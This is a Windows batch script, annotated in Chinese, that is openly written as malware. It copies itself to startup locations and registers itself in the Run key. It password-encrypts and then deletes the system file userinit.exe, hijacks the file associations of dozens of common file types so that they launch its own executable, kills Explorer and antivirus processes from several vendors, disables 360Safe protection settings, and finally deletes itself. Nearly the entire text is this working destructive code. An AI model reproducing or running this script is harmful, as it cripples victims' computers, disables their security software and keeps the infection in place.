copy %0 "%USERPROFILE%\「开始」菜单\程序\启动\" 复制自身到开机启动
copy %0
"C:\WINDOWS\file.exe"
复制自身到
C
盘WINDOWS
c
:\rar.exe a -ad -k -s -ibck -p[user]
"C:\user.rar"
"C:\WINDOWS\system32\userinit.exe"
把文件userinit.exe加密
del
C
:\WINDOWS\system32\userinit.exe /s /f /q 把文件userinit.exe删除
reg
add
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 复制自身到开机启动
reg
add
"HKEY_CLASSES_ROOT\DLfile\DefaultIcon"
/ve /t REG_EXPAND_SZ /f 创建文件注册表
reg
add
"HKEY_CLASSES_ROOT\DLfile\shell\open\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\DLfile\shell\print\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\nlsfile\DefaultIcon"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\nlsfile\shell\open\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\nlsfile\shell\print\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\nlsfile\shell\open\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\nlsfile\shell\print\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\nlsfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 修改文件图标为“
C
:\WINDOWS\XM.ico”
reg
add
"HKEY_CLASSES_ROOT\DLfile\shell\open\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\DLfile\shell\print\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\DLfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 修改文件图标为“
C
:\WINDOWS\XM.ico”
reg
add
"HKEY_CLASSES_ROOT\BMPfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\datfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\inifile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\OLDfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\TMPfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\PRXfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\inifile\shell\open\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\inifile\shell\print\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F 修改文件打开方式为自身
reg
add
"HKEY_CLASSES_ROOT\scrfile\DefaultIcon"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scrfile\shell\open\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scrfile\shell\print\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scrfile\shell\open\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\scrfile\shell\print\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\scrfile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\scffile\DefaultIcon"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scffile\shell\open\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scffile\shell\print\command"
/ve /t REG_EXPAND_SZ /f
reg
add
"HKEY_CLASSES_ROOT\scffile\shell\open\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\scffile\shell\print\command"
/ve /d
C
:\WINDOWS\file.exe /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\scffile\DefaultIcon"
/ve /d
C
:\WINDOWS\XM.ico /t REG_SZ /F
reg
add
"HKEY_CLASSES_ROOT\.lnk"
/ve /d DLfile /t REG_SZ /F 修改文件注册表关联为DLfile
reg
add
"HKEY_CLASSES_ROOT\.reg"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.jpg"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.wav"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.mp4"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.com"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.avi"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.vod"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.rar"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.scf"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.xls"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.txt"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.zip"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.cmd"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.doc"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.dll"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.log"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.pdf"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.vbs"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.zip"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.rar"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.7z"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.nls"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.scr"
/ve /d DLfile /t REG_SZ /F 同上
reg
add
"HKEY_CLASSES_ROOT\.scf"
/ve /d DLfile /t REG_SZ /F 同上
taskkill /im Explorer.exe /f 结束桌面进程
ping -n 3 127.0.0.1 等待时间为3秒
explorer.exe 运行桌面进程(小重启 来刷新注册表服务加载项)
taskkill /f /im kavsvc.exe 结束进程
taskkill /f /im KVXP.kxp 结束进程
taskkill /f /im Rav.exe 结束进程
taskkill /f /im Ravmon.exe 结束进程
taskkill /f /im Mcshield.exe 结束进程
taskkill /f /im VsTskMgr.exe 结束进程
taskkill /f /im 360tray.exe 结束进程
reg
add
"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\ExecAccess\" /ve /d 0 /t REG_SZ /F
reg
add
"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\MonAccess"
/ve /d 0 /t REG_SZ /F
reg
add
"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\SiteAccess"
/ve /d 0 /t REG_SZ /F
reg
add
"HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\UDiskAccess"
/ve /d 0 /t REG_SZ /F
del %0 删除自身